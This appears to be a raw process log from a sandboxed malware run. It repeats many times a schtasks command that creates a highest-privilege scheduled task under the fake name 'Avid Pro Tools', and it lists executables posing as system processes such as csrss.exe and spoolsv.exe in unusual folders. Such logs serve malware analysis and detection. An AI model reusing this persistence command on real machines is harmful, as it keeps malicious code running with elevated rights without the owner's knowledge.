"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\spoolsv.exe
C:\winNet\spoolsv.exe
C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe
C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\All Users\Microsoft\eHome\wininit.exe
"C:\Users\All Users\Microsoft\eHome\wininit.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\winNet\Bloxstrap.exe
C:\winNet\Bloxstrap.exe
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\Offline Web Pages\Refcrt.exe
"C:\Windows\Offline Web Pages\Refcrt.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\Offline Web Pages\Refcrt.exe.exe
"C:\Windows\Offline Web Pages\Refcrt.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\Bloxstrap.exe.exe
"C:\winNet\Bloxstrap.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Users\All Users\Microsoft\eHome\wininit.exe.exe
"C:\Users\All Users\Microsoft\eHome\wininit.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\Idle.exe
C:\winNet\Idle.exe
C:\winNet\wscript.exe
C:\winNet\wscript.exe
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\winNet\wscript.exe.exe
"C:\winNet\wscript.exe.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\Admin\AppData\Local\csrss.exe
"C:\Users\Admin\AppData\Local\csrss.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe
"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"
C:\Program Files\Windows Defender\es-ES\cmd.exe
"C:\Program Files\Windows Defender\es-ES\cmd.exe"
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
C:\Windows\system32\CMD.exe
"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
C:\Windows\system32\schtasks.exe
